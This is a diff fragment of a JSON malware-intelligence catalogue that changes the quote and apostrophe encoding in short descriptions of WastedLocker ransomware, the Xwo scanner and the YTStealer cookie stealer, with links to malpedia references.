"description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.",
"description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victims name and the string wasted. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker",
@ -53807,7 +53807,7 @@
"value": "X-Tunnel (.NET)"
},
{
"description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.",
"description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo",
@ -54078,7 +54078,7 @@
"value": "YourCyanide"
},
{
"description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it\u2019s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.",
"description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when its executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer",
@ -54825,4 +54825,4 @@
}
],
"version": 19000
}
}